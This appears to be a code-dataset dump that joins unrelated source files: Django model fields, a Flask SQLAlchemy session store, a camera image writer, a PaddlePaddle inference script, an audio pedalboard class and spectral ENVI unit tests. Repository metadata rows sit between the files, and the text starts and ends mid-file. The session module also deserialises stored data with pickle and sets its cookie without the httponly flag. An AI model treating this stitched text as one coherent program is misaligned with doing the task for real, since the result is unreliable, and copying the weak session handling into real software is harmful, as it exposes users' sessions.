item_321_choices = [('understands', 'understands'), ('produces', 'produces')]
item_321 = models.CharField(max_length=11, choices=item_321_choices, null=True)
item_322_choices = [('understands', 'understands'), ('produces', 'produces')]
item_322 = models.CharField(max_length=11, choices=item_322_choices, null=True)
item_323_choices = [('understands', 'understands'), ('produces', 'produces')]
item_323 = models.CharField(max_length=11, choices=item_323_choices, null=True)
item_324_choices = [('understands', 'understands'), ('produces', 'produces')]
item_324 = models.CharField(max_length=11, choices=item_324_choices, null=True)
item_325_choices = [('understands', 'understands'), ('produces', 'produces')]
item_325 = models.CharField(max_length=11, choices=item_325_choices, null=True)
item_326_choices = [('understands', 'understands'), ('produces', 'produces')]
item_326 = models.CharField(max_length=11, choices=item_326_choices, null=True)
item_327_choices = [('understands', 'understands'), ('produces', 'produces')]
item_327 = models.CharField(max_length=11, choices=item_327_choices, null=True)
item_328_choices = [('understands', 'understands'), ('produces', 'produces')]
item_328 = models.CharField(max_length=11, choices=item_328_choices, null=True)
item_329_choices = [('understands', 'understands'), ('produces', 'produces')]
item_329 = models.CharField(max_length=11, choices=item_329_choices, null=True)
item_330_choices = [('understands', 'understands'), ('produces', 'produces')]
item_330 = models.CharField(max_length=11, choices=item_330_choices, null=True)
item_331_choices = [('understands', 'understands'), ('produces', 'produces')]
item_331 = models.CharField(max_length=11, choices=item_331_choices, null=True)
item_332_choices = [('understands', 'understands'), ('produces', 'produces')]
item_332 = models.CharField(max_length=11, choices=item_332_choices, null=True)
item_333_choices = [('understands', 'understands'), ('produces', 'produces')]
item_333 = models.CharField(max_length=11, choices=item_333_choices, null=True)
item_334_choices = [('understands', 'understands'), ('produces', 'produces')]
item_334 = models.CharField(max_length=11, choices=item_334_choices, null=True)
item_335_choices = [('understands', 'understands'), ('produces', 'produces')]
item_335 = models.CharField(max_length=11, choices=item_335_choices, null=True)
item_336_choices = [('understands', 'understands'), ('produces', 'produces')]
item_336 = models.CharField(max_length=11, choices=item_336_choices, null=True)
item_337_choices = [('understands', 'understands'), ('produces', 'produces')]
item_337 = models.CharField(max_length=11, choices=item_337_choices, null=True)
item_338_choices = [('understands', 'understands'), ('produces', 'produces')]
item_338 = models.CharField(max_length=11, choices=item_338_choices, null=True)
item_339_choices = [('understands', 'understands'), ('produces', 'produces')]
item_339 = models.CharField(max_length=11, choices=item_339_choices, null=True)
item_340_choices = [('understands', 'understands'), ('produces', 'produces')]
item_340 = models.CharField(max_length=11, choices=item_340_choices, null=True)
item_341_choices = [('understands', 'understands'), ('produces', 'produces')]
item_341 = models.CharField(max_length=11, choices=item_341_choices, null=True)
item_342_choices = [('understands', 'understands'), ('produces', 'produces')]
item_342 = models.CharField(max_length=11, choices=item_342_choices, null=True)
item_343_choices = [('understands', 'understands'), ('produces', 'produces')]
item_343 = models.CharField(max_length=11, choices=item_343_choices, null=True)
item_344_choices = [('understands', 'understands'), ('produces', 'produces')]
item_344 = models.CharField(max_length=11, choices=item_344_choices, null=True)
item_345_choices = [('understands', 'understands'), ('produces', 'produces')]
item_345 = models.CharField(max_length=11, choices=item_345_choices, null=True)
item_346_choices = [('understands', 'understands'), ('produces', 'produces')]
item_346 = models.CharField(max_length=11, choices=item_346_choices, null=True)
item_347_choices = [('understands', 'understands'), ('produces', 'produces')]
item_347 = models.CharField(max_length=11, choices=item_347_choices, null=True)
item_348_choices = [('understands', 'understands'), ('produces', 'produces')]
item_348 = models.CharField(max_length=11, choices=item_348_choices, null=True)
item_349_choices = [('understands', 'understands'), ('produces', 'produces')]
item_349 = models.CharField(max_length=11, choices=item_349_choices, null=True)
item_350_choices = [('understands', 'understands'), ('produces', 'produces')]
item_350 = models.CharField(max_length=11, choices=item_350_choices, null=True)
item_351_choices = [('understands', 'understands'), ('produces', 'produces')]
item_351 = models.CharField(max_length=11, choices=item_351_choices, null=True)
item_352_choices = [('understands', 'understands'), ('produces', 'produces')]
item_352 = models.CharField(max_length=11, choices=item_352_choices, null=True)
item_353_choices = [('understands', 'understands'), ('produces', 'produces')]
item_353 = models.CharField(max_length=11, choices=item_353_choices, null=True)
item_354_choices = [('understands', 'understands'), ('produces', 'produces')]
item_354 = models.CharField(max_length=11, choices=item_354_choices, null=True)
item_355_choices = [('understands', 'understands'), ('produces', 'produces')]
item_355 = models.CharField(max_length=11, choices=item_355_choices, null=True)
item_356_choices = [('understands', 'understands'), ('produces', 'produces')]
item_356 = models.CharField(max_length=11, choices=item_356_choices, null=True)
item_357_choices = [('understands', 'understands'), ('produces', 'produces')]
item_357 = models.CharField(max_length=11, choices=item_357_choices, null=True)
item_358_choices = [('understands', 'understands'), ('produces', 'produces')]
item_358 = models.CharField(max_length=11, choices=item_358_choices, null=True)
item_359_choices = [('understands', 'understands'), ('produces', 'produces')]
item_359 = models.CharField(max_length=11, choices=item_359_choices, null=True)
item_360_choices = [('understands', 'understands'), ('produces', 'produces')]
item_360 = models.CharField(max_length=11, choices=item_360_choices, null=True)
item_361_choices = [('understands', 'understands'), ('produces', 'produces')]
item_361 = models.CharField(max_length=11, choices=item_361_choices, null=True)
item_362_choices = [('understands', 'understands'), ('produces', 'produces')]
item_362 = models.CharField(max_length=11, choices=item_362_choices, null=True)
item_363_choices = [('understands', 'understands'), ('produces', 'produces')]
item_363 = models.CharField(max_length=11, choices=item_363_choices, null=True)
item_364_choices = [('understands', 'understands'), ('produces', 'produces')]
item_364 = models.CharField(max_length=11, choices=item_364_choices, null=True)
item_365_choices = [('understands', 'understands'), ('produces', 'produces')]
item_365 = models.CharField(max_length=11, choices=item_365_choices, null=True)
item_366_choices = [('understands', 'understands'), ('produces', 'produces')]
item_366 = models.CharField(max_length=11, choices=item_366_choices, null=True)
item_367_choices = [('understands', 'understands'), ('produces', 'produces')]
item_367 = models.CharField(max_length=11, choices=item_367_choices, null=True)
item_368_choices = [('understands', 'understands'), ('produces', 'produces')]
item_368 = models.CharField(max_length=11, choices=item_368_choices, null=True)
item_369_choices = [('understands', 'understands'), ('produces', 'produces')]
item_369 = models.CharField(max_length=11, choices=item_369_choices, null=True)
item_370_choices = [('understands', 'understands'), ('produces', 'produces')]
item_370 = models.CharField(max_length=11, choices=item_370_choices, null=True)
item_371_choices = [('understands', 'understands'), ('produces', 'produces')]
item_371 = models.CharField(max_length=11, choices=item_371_choices, null=True)
item_372_choices = [('understands', 'understands'), ('produces', 'produces')]
item_372 = models.CharField(max_length=11, choices=item_372_choices, null=True)
item_373_choices = [('understands', 'understands'), ('produces', 'produces')]
item_373 = models.CharField(max_length=11, choices=item_373_choices, null=True)
item_374_choices = [('understands', 'understands'), ('produces', 'produces')]
item_374 = models.CharField(max_length=11, choices=item_374_choices, null=True)
item_375_choices = [('understands', 'understands'), ('produces', 'produces')]
item_375 = models.CharField(max_length=11, choices=item_375_choices, null=True)
item_376_choices = [('understands', 'understands'), ('produces', 'produces')]
item_376 = models.CharField(max_length=11, choices=item_376_choices, null=True)
item_377_choices = [('understands', 'understands'), ('produces', 'produces')]
item_377 = models.CharField(max_length=11, choices=item_377_choices, null=True)
item_378_choices = [('understands', 'understands'), ('produces', 'produces')]
item_378 = models.CharField(max_length=11, choices=item_378_choices, null=True)
item_379_choices = [('understands', 'understands'), ('produces', 'produces')]
item_379 = models.CharField(max_length=11, choices=item_379_choices, null=True)
item_380_choices = [('understands', 'understands'), ('produces', 'produces')]
item_380 = models.CharField(max_length=11, choices=item_380_choices, null=True)
item_381_choices = [('understands', 'understands'), ('produces', 'produces')]
item_381 = models.CharField(max_length=11, choices=item_381_choices, null=True)
item_382_choices = [('understands', 'understands'), ('produces', 'produces')]
item_382 = models.CharField(max_length=11, choices=item_382_choices, null=True)
item_383_choices = [('understands', 'understands'), ('produces', 'produces')]
item_383 = models.CharField(max_length=11, choices=item_383_choices, null=True)
item_384_choices = [('understands', 'understands'), ('produces', 'produces')]
item_384 = models.CharField(max_length=11, choices=item_384_choices, null=True)
item_385_choices = [('understands', 'understands'), ('produces', 'produces')]
item_385 = models.CharField(max_length=11, choices=item_385_choices, null=True)
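# Each item_* field above repeats the same two-line pattern. If the items
# never need distinct choice lists, a single shared constant would shrink
# this considerably -- a hypothetical refactor, assuming no per-field
# customization is required:
#
#   ITEM_CHOICES = [('understands', 'understands'), ('produces', 'produces')]
#   item_198 = models.CharField(max_length=11, choices=ITEM_CHOICES, null=True)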
| gpl-2.0 | 4,529,313,738,187,687,000 | 81.174194 | 83 | 0.685358 | false | 3.440759 | false | false | false |
bcarroll/authmgr | authmgr/authmgr/lib/Flask_SQLAlchemySession/__init__.py | 1 | 3240 | """
Server-side session storage for Flask, backed by SQLAlchemy.
Adapted from:
https://github.com/MSA-Argentina/FlaskSQLAlchemySession/edit/master/FlaskSQLAlchemySession/__init__.py
Module-level state:
    db {SQLAlchemy} -- shared Flask-SQLAlchemy instance that owns the session table
    _table_name {str} -- name of the database table that stores session rows
    _data_serializer -- serializer used to encode/decode session payloads (pickle)
"""
from __future__ import absolute_import
import pickle
from datetime import timedelta, datetime
from uuid import uuid4
from werkzeug.datastructures import CallbackDict
from flask.sessions import SessionInterface, SessionMixin
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
_table_name = "sessions"
_data_serializer = pickle
def set_db_session_interface(app, table_name=None, data_serializer=None):
global _table_name, _data_serializer
if table_name is not None:
_table_name = table_name
if data_serializer is not None:
_data_serializer = data_serializer
db.init_app(app)
app.session_interface = SQLAlchemySessionInterface()
return app
class SQLAlchemySession(CallbackDict, SessionMixin):
def __init__(self, initial=None, sid=None, new=False):
        def on_update(updated):
            # CallbackDict invokes this with the mutated dict itself
            # (i.e. this session), so flag it as modified.
            updated.modified = True
CallbackDict.__init__(self, initial, on_update)
self.sid = sid
self.new = new
self.modified = False
class SQLAlchemySessionInterface(SessionInterface):
def __init__(self):
# this could be your mysql database or sqlalchemy db object
pass
def generate_sid(self):
return str(uuid4())
def open_session(self, app, request):
# query your cookie for the session id
ret = None
sid = request.cookies.get(app.session_cookie_name)
if not sid:
sid = self.generate_sid()
ret = SQLAlchemySession(sid=sid, new=True)
else:
val = Session.query.get(sid)
if val is not None:
data = _data_serializer.loads(val.data)
ret = SQLAlchemySession(data, sid=sid)
else:
ret = SQLAlchemySession(sid=sid, new=True)
return ret
def save_session(self, app, session, response):
        # persist the session data in the db (insert or update) and
        # set the session cookie on the response
domain = self.get_cookie_domain(app)
val = Session.query.get(session.sid)
now = datetime.utcnow()
if not session:
            if val is not None:
                db.session.delete(val)
                db.session.commit()
if session.modified:
response.delete_cookie(app.session_cookie_name, domain=domain)
else:
data = _data_serializer.dumps(dict(session))
if val is None:
val = Session(session_id=session.sid, data=data, atime=now)
else:
val.atime = now
val.data = data
db.session.add(val)
db.session.commit()
response.set_cookie(app.session_cookie_name, session.sid,
expires=now + timedelta(days=1), httponly=False,
domain=domain)
class Session(db.Model):
__tablename__ = _table_name
session_id = db.Column(db.String(129), unique=True, primary_key=True)
atime = db.Column(db.DateTime())
data = db.Column(db.Text())
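# Minimal usage sketch (assumes a Flask app, a reachable database URI, and a
# one-time db.create_all() so the sessions table exists):
#
#   from flask import Flask, session
#
#   app = Flask(__name__)
#   app.secret_key = 'change-me'
#   app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sessions.db'
#   app = set_db_session_interface(app)
#
#   with app.app_context():
#       db.create_all()
#
#   @app.route('/')
#   def index():
#       session['visits'] = session.get('visits', 0) + 1
#       return str(session['visits'])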
| bsd-3-clause | 2,075,606,725,752,848,000 | 28.724771 | 102 | 0.614198 | false | 4.0399 | false | false | false |
Ironpulse/CRC2017 | Cam/imagewriter.py | 1 | 4698 |
import os.path
import time
import threading
import cv2
import numpy as np
import logging
logger = logging.getLogger('cscore.storage')
class ImageWriter:
'''
Creates a thread that periodically writes images to a specified
directory. Useful for looking at images after a match has
completed.
The default location is ``/media/sda1/camera``. The folder
``/media/sda1`` is the default location that USB drives inserted into
the RoboRIO are mounted at. The USB drive must have a directory in it
named ``camera``.
.. note:: It is recommended to only write images when something useful
(such as targeting) is happening, otherwise you'll end up
with a lot of images written to disk that you probably aren't
interested in.
Intended usage is::
self.image_writer = ImageWriter()
..
while True:
img = ..
if self.logging_enabled:
self.image_writer.setImage(img)
'''
def __init__(self, *, location_root='/media/sda1/camera',
capture_period=0.5,
image_format='jpg'):
'''
:param location_root: Directory to write images to. A subdirectory
with the current time will be created, and
timestamped images will be written to the
subdirectory.
:param capture_period: How often to write images to disk
:param image_format: File extension of files to write
'''
self.location_root = os.path.abspath(location_root)
self.capture_period = capture_period
self.image_format = image_format
self.active = True
self._location = None
self.has_image = False
self.size = None
self.lock = threading.Condition()
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def setImage(self, img):
'''
Call this function when you wish to write the image to disk. Not
every image is written to disk. Makes a copy of the image.
:param img: A numpy array representing an OpenCV image
'''
if not self.active:
return
if self.size is None or self.size[0] != img.shape[0] or self.size[1] != img.shape[1]:
h, w = img.shape[:2]
self.size = (h, w)
self.out1 = np.empty((h, w, 3), dtype=np.uint8)
self.out2 = np.empty((h, w, 3), dtype=np.uint8)
with self.lock:
cv2.copyMakeBorder(img, 0, 0, 0, 0, cv2.BORDER_CONSTANT, value=(0,0,255), dst=self.out1)
self.has_image = True
self.lock.notify()
@property
def location(self):
if self._location is None:
# This assures that we only log when a USB memory stick is plugged in
if not os.path.exists(self.location_root):
raise IOError("Logging disabled, %s does not exist" % self.location_root)
# Can't do this when program starts, time might be wrong. Ideally by now the DS
# has connected, so the time will be correct
self._location = self.location_root + '/%s' % time.strftime('%Y-%m-%d %H.%M.%S')
logger.info("Logging to %s", self._location)
os.makedirs(self._location, exist_ok=True)
return self._location
def _run(self):
last = time.time()
logger.info("Storage thread started")
try:
while True:
with self.lock:
now = time.time()
while (not self.has_image) or (now - last) < self.capture_period:
self.lock.wait()
now = time.time()
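                    # Swap the double buffers while still holding the lock so
                    # setImage() keeps writing into out1 while out2 is saved.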
self.out2, self.out1 = self.out1, self.out2
self.has_image = False
fname = '%s/%.2f.%s' % (self.location, now, self.image_format)
cv2.imwrite(fname, self.out2)
last = now
except IOError as e:
logger.error("Error logging images: %s", e)
logger.warn("Storage thread exited")
self.active = False
| agpl-3.0 | -402,439,446,709,973,600 | 33.807407 | 100 | 0.508514 | false | 4.619469 | false | false | false |
zhaopu7/models | nce_cost/infer.py | 1 | 1992 | # -*- encoding:utf-8 -*-
import numpy as np
import glob
import gzip
import paddle.v2 as paddle
from nce_conf import network_conf
def main():
paddle.init(use_gpu=False, trainer_count=1)
word_dict = paddle.dataset.imikolov.build_dict()
dict_size = len(word_dict)
prediction_layer = network_conf(
is_train=False,
hidden_size=128,
embedding_size=512,
dict_size=dict_size)
models_list = glob.glob('./models/*')
models_list = sorted(models_list)
with gzip.open(models_list[-1], 'r') as f:
parameters = paddle.parameters.Parameters.from_tar(f)
idx_word_dict = dict((v, k) for k, v in word_dict.items())
batch_size = 64
batch_ins = []
ins_iter = paddle.dataset.imikolov.test(word_dict, 5)
infer_data = []
infer_data_label = []
for item in paddle.dataset.imikolov.test(word_dict, 5)():
infer_data.append((item[:4]))
infer_data_label.append(item[4])
# Choose 100 samples from the test set to show how to infer.
if len(infer_data_label) == 100:
break
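    # `feeding` maps each input layer name in the network config to the
    # index of the corresponding element in the data tuples built above.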
feeding = {
'firstw': 0,
'secondw': 1,
'thirdw': 2,
'fourthw': 3,
'fifthw': 4
}
predictions = paddle.infer(
output_layer=prediction_layer,
parameters=parameters,
input=infer_data,
feeding=feeding,
field=['value'])
for i, (prob, data,
label) in enumerate(zip(predictions, infer_data, infer_data_label)):
print '--------------------------'
print "No.%d Input: " % (i+1) + \
idx_word_dict[data[0]] + ' ' + \
idx_word_dict[data[1]] + ' ' + \
idx_word_dict[data[2]] + ' ' + \
idx_word_dict[data[3]]
print 'Ground Truth Output: ' + idx_word_dict[label]
print 'Predict Output: ' + idx_word_dict[prob.argsort(
kind='heapsort', axis=0)[-1]]
print
if __name__ == '__main__':
main()
| apache-2.0 | -6,765,368,289,635,308,000 | 27.457143 | 80 | 0.549197 | false | 3.387755 | false | false | false |
PedalPi/PluginsManager | pluginsmanager/model/pedalboard.py | 1 | 8060 | # Copyright 2017 SrMouraSilva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pluginsmanager.model.effects_list import EffectsList
from pluginsmanager.model.connections_list import ConnectionsList
from pluginsmanager.observer.update_type import UpdateType
from unittest.mock import MagicMock
class Pedalboard(object):
"""
    Pedalboard is a patch representation: its structure contains
:class:`.Effect` and :class:`~pluginsmanager.model.connection.Connection`::
>>> pedalboard = Pedalboard('Rocksmith')
>>> bank.append(pedalboard)
>>> builder = Lv2EffectBuilder()
>>> pedalboard.effects
[]
>>> reverb = builder.build('http://calf.sourceforge.net/plugins/Reverb')
>>> pedalboard.append(reverb)
>>> pedalboard.effects
[<Lv2Effect object as 'Calf Reverb' active at 0x7f60effb09e8>]
>>> fuzz = builder.build('http://guitarix.sourceforge.net/plugins/gx_fuzzfacefm_#_fuzzfacefm_')
>>> pedalboard.effects.append(fuzz)
>>> pedalboard.connections
[]
>>> pedalboard.connections.append(Connection(sys_effect.outputs[0], fuzz.inputs[0])) # View SystemEffect for more details
>>> pedalboard.connections.append(Connection(fuzz.outputs[0], reverb.inputs[0]))
>>> # It works too
>>> pedalboard.connect(reverb.outputs[1], sys_effect.inputs[0])
>>> pedalboard.connections
[<Connection object as 'system.capture_1 -> GxFuzzFaceFullerMod.In' at 0x7f60f45f3f60>, <Connection object as 'GxFuzzFaceFullerMod.Out -> Calf Reverb.In L' at 0x7f60f45f57f0>, <Connection object as 'Calf Reverb.Out R -> system.playback_1' at 0x7f60f45dacc0>]
>>> pedalboard.data
{}
>>> pedalboard.data = {'my-awesome-component': True}
>>> pedalboard.data
{'my-awesome-component': True}
For load the pedalboard for play the songs with it::
>>> mod_host.pedalboard = pedalboard
All changes¹ in the pedalboard will be reproduced in mod-host.
    ¹ Except the ``data`` attribute: changes to it do not interfere with anything.
:param string name: Pedalboard name
"""
def __init__(self, name):
self.name = name
self._effects = EffectsList()
self._connections = ConnectionsList(self)
self.effects.observer = self._effects_observer
self.connections.observer = self._connections_observer
self._observer = MagicMock()
self.bank = None
self.data = {}
@property
def observer(self):
return self._observer
@observer.setter
def observer(self, observer):
self._observer = observer
for effect in self.effects:
effect.observer = observer
def _effects_observer(self, update_type, effect, index, **kwargs):
kwargs['index'] = index
kwargs['origin'] = self
if update_type == UpdateType.CREATED:
self._init_effect(effect)
elif update_type == UpdateType.UPDATED:
self._init_effect(effect)
old_effect = kwargs['old']
if old_effect not in self.effects:
self._clear_effect(old_effect)
elif update_type == UpdateType.DELETED:
self._clear_effect(effect)
self.observer.on_effect_updated(effect, update_type, index=index, origin=self)
def _init_effect(self, effect):
effect.pedalboard = self
effect.observer = self.observer
def _clear_effect(self, effect):
for connection in effect.connections:
self.connections.remove_silently(connection)
effect.pedalboard = None
effect.observer = MagicMock()
def _connections_observer(self, update_type, connection, index, **kwargs):
self.observer.on_connection_updated(connection, update_type, pedalboard=self, **kwargs)
@property
def json(self):
"""
Get a json decodable representation of this pedalboard
:return dict: json representation
"""
return self.__dict__
@property
def __dict__(self):
return {
'name': self.name,
'effects': [effect.json for effect in self.effects],
'connections': [connection.json for connection in self.connections],
'data': self.data
}
def append(self, effect):
"""
Add a :class:`.Effect` in this pedalboard
This works same as::
>>> pedalboard.effects.append(effect)
or::
>>> pedalboard.effects.insert(len(pedalboard.effects), effect)
:param Effect effect: Effect that will be added
"""
self.effects.append(effect)
@property
def effects(self):
"""
Return the effects presents in the pedalboard
.. note::
            Because ``effects`` is an :class:`.ObservableList`, it isn't settable.
            To replace it, remove the unnecessary effects and add the necessary
            ones
"""
return self._effects
@property
def connections(self):
"""
Return the pedalboard connections list
.. note::
            Because ``connections`` is an :class:`.ObservableList`, it isn't settable.
            To replace them, remove the unnecessary connections and add the
            necessary ones
"""
return self._connections
@property
def index(self):
"""
        Returns the index of the first occurrence of this pedalboard in its bank
"""
if self.bank is None:
raise IndexError('Pedalboard not contains a bank')
return self.bank.pedalboards.index(self)
def connect(self, output_port, input_port):
"""
Connect two :class:`.Effect` instances in this pedalboard.
        To do this, pass the origin output port and the destination input port::
>>> pedalboard.append(driver)
>>> pedalboard.append(reverb)
>>> driver_output = driver.outputs[0]
>>> reverb_input = reverb.inputs[0]
>>> Connection(driver_output, reverb_input) in driver.connections
False
>>> pedalboard.connect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
True
:param Port output_port: Effect output port
:param Port input_port: Effect input port
"""
ConnectionClass = output_port.connection_class
self.connections.append(ConnectionClass(output_port, input_port))
def disconnect(self, output_port, input_port):
"""
Remove a connection between (two ports of) :class:`.Effect` instances.
        To do this, pass the origin output port and the destination input port::
>>> pedalboard.append(driver)
>>> pedalboard.append(reverb)
>>> driver_output = driver.outputs[0]
>>> reverb_input = reverb.inputs[0]
>>> pedalboard.connect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
True
>>> pedalboard.disconnect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
False
:param Port output_port: Effect output port
:param Port input_port: Effect input port
"""
ConnectionClass = output_port.connection_class
self.connections.remove(ConnectionClass(output_port, input_port))
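# Minimal end-to-end sketch (assumes the Calf Reverb LV2 plugin is installed
# and that the JACK system ports match the names given to SystemEffect):
#
#   from pluginsmanager.model.lv2.lv2_effect_builder import Lv2EffectBuilder
#   from pluginsmanager.model.system.system_effect import SystemEffect
#
#   sys_effect = SystemEffect('system', ['capture_1'], ['playback_1'])
#   reverb = Lv2EffectBuilder().build('http://calf.sourceforge.net/plugins/Reverb')
#
#   pedalboard = Pedalboard('Demo')
#   pedalboard.append(reverb)
#   pedalboard.connect(sys_effect.outputs[0], reverb.inputs[0])
#   pedalboard.connect(reverb.outputs[0], sys_effect.inputs[0])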
| apache-2.0 | -5,304,959,297,585,082,000 | 33.435897 | 266 | 0.632043 | false | 4.092433 | false | false | false |
RubnC/modified-spectral | spectral/tests/envi.py | 1 | 11101 | #########################################################################
#
# envi.py - This file is part of the Spectral Python (SPy) package.
#
# Copyright (C) 2013 Thomas Boggs
#
# Spectral Python is free software; you can redistribute it and/
# or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Spectral Python is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; if not, write to
#
# Free Software Foundation, Inc.
# 59 Temple Place, Suite 330
# Boston, MA 02111-1307
# USA
#
#########################################################################
#
# Send comments to:
# Thomas Boggs, [email protected]
#
# spyfile.py
'''Runs unit tests of functions associated with the ENVI file format.
To run the unit tests, type the following from the system command line:
# python -m spectral.tests.envi
'''
from __future__ import division, print_function, unicode_literals
import numpy as np
import os
from numpy.testing import assert_almost_equal
from .spytest import SpyTest
from spectral.tests import testdir
class ENVIWriteTest(SpyTest):
'''Tests that SpyFile memmap interfaces read and write properly.'''
def __init__(self):
pass
def setup(self):
import os
if not os.path.isdir(testdir):
os.makedirs(testdir)
def test_save_image_ndarray(self):
        '''Test saving an ENVI formatted image from a numpy.ndarray.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
datum = 33
data = np.zeros((R, B, C), dtype=np.uint16)
data[r, b, c] = datum
fname = os.path.join(testdir, 'test_save_image_ndarray.hdr')
spectral.envi.save_image(fname, data, interleave='bil')
img = spectral.open_image(fname)
assert_almost_equal(img[r, b, c], datum)
def test_save_image_ndarray_no_ext(self):
        '''Test saving an ENVI formatted image with no image file extension.'''
import os
import spectral
data = np.arange(1000, dtype=np.int16).reshape(10, 10, 10)
base = os.path.join(testdir, 'test_save_image_ndarray_noext')
hdr_file = base + '.hdr'
spectral.envi.save_image(hdr_file, data, ext='')
rdata = spectral.open_image(hdr_file).load()
assert(np.all(data==rdata))
def test_save_image_ndarray_alt_ext(self):
        '''Test saving an ENVI formatted image with alternate extension.'''
import os
import spectral
data = np.arange(1000, dtype=np.int16).reshape(10, 10, 10)
base = os.path.join(testdir, 'test_save_image_ndarray_alt_ext')
hdr_file = base + '.hdr'
ext = '.foo'
img_file = base + ext
spectral.envi.save_image(hdr_file, data, ext=ext)
rdata = spectral.envi.open(hdr_file, img_file).load()
assert(np.all(data==rdata))
def test_save_image_spyfile(self):
'''Test saving an ENVI formatted image from a SpyFile object.'''
import os
import spectral
(r, b, c) = (3, 8, 23)
fname = os.path.join(testdir, 'test_save_image_spyfile.hdr')
src = spectral.open_image('92AV3C.lan')
spectral.envi.save_image(fname, src)
img = spectral.open_image(fname)
assert_almost_equal(src[r, b, c], img[r, b, c])
def test_create_image_metadata(self):
'''Test calling `envi.create_image` using a metadata dict.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
offset = 1024
datum = 33
md = {'lines': R,
'samples': B,
'bands': C,
'interleave': 'bsq',
'header offset': offset,
'data type': 12,
'USER DEFINED': 'test case insensitivity'}
fname = os.path.join(testdir, 'test_create_image_metadata.hdr')
img = spectral.envi.create_image(fname, md)
mm = img.open_memmap(writable=True)
mm.fill(0)
mm[r, b, c] = datum
mm.flush()
img = spectral.open_image(fname)
img._disable_memmap()
assert_almost_equal(img[r, b, c], datum)
assert(img.offset == offset)
for key in md:
assert key.lower() in img.metadata
assert str(md[key]) == img.metadata[key.lower()]
def test_create_image_keywords(self):
'''Test calling `envi.create_image` using keyword args.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
offset = 1024
datum = 33
fname = os.path.join(testdir, 'test_create_image_keywords.hdr')
img = spectral.envi.create_image(fname, shape=(R,B,C),
interleave='bsq',
dtype=np.uint16,
offset=offset)
mm = img.open_memmap(writable=True)
mm.fill(0)
mm[r, b, c] = datum
mm.flush()
img = spectral.open_image(fname)
img._disable_memmap()
assert_almost_equal(img[r, b, c], datum)
assert(img.offset == offset)
def test_save_invalid_dtype_fails(self):
'''Should not be able to write unsupported data type to file.'''
import spectral as spy
from spectral.io.envi import EnviDataTypeError
a = np.random.randint(0, 200, 900).reshape((30, 30)).astype(np.int8)
fname = os.path.join(testdir, 'test_save_invalid_dtype_fails.hdr')
try:
            spy.envi.save_image(fname, a)
except EnviDataTypeError as e:
pass
else:
raise Exception('Expected EnviDataTypeError to be raised.')
def test_save_load_classes(self):
'''Verify that `envi.save_classification` saves data correctly.'''
import spectral as spy
fname = os.path.join(testdir, 'test_save_load_classes.hdr')
gt = spy.open_image('92AV3GT.GIS').read_band(0)
spy.envi.save_classification(fname, gt, dtype=np.uint8)
gt2 = spy.open_image(fname).read_band(0)
assert(np.all(gt == gt2))
def test_open_nonzero_frame_offset_fails(self):
'''Opening files with nonzero frame offsets should fail.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_open_nonzero_frame_offset_fails.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('major frame offsets = 128\n')
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.EnviFeatureNotSupported:
pass
else:
raise Exception('File erroneously opened.')
def test_open_zero_frame_offset_passes(self):
'''Files with frame offsets set to zero should open.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_open_zero_frame_offset_passes.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('major frame offsets = 0\n')
fout.write('minor frame offsets = {0, 0}\n')
fout.close()
img2 = spy.envi.open(fname)
def test_save_nonzero_frame_offset_fails(self):
        '''Saving files with nonzero frame offsets should fail.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_save_nonzero_frame_offset_fails.hdr')
meta = {'major frame offsets' : [128, 0]}
try:
spy.envi.save_image(fname, img, metadata=meta)
except spy.envi.EnviFeatureNotSupported:
pass
else:
raise Exception('File erroneously saved.')
def test_save_zero_frame_offset_passes(self):
        '''Saving files with zero frame offsets should pass.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_save_zero_frame_offset_passes.hdr')
meta = {'major frame offsets' : 0}
spy.envi.save_image(fname, img, metadata=meta)
def test_catch_parse_error(self):
'''Failure to parse parameters should raise EnviHeaderParsingError.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_catch_parse_error.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('foo = {{\n')
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.EnviHeaderParsingError:
pass
else:
raise Exception('Failed to raise EnviHeaderParsingError')
def test_header_missing_mandatory_parameter_fails(self):
        '''Missing mandatory parameter should raise MissingEnviHeaderParameter.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_missing_param_fails.hdr')
spy.envi.save_image(fname, img)
lines = [line for line in open(fname).readlines() \
if 'bands' not in line]
fout = open(fname, 'w')
for line in lines:
fout.write(line)
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.MissingEnviHeaderParameter:
pass
else:
            raise Exception('Failed to raise MissingEnviHeaderParameter')
def test_missing_ENVI_in_header_fails(self):
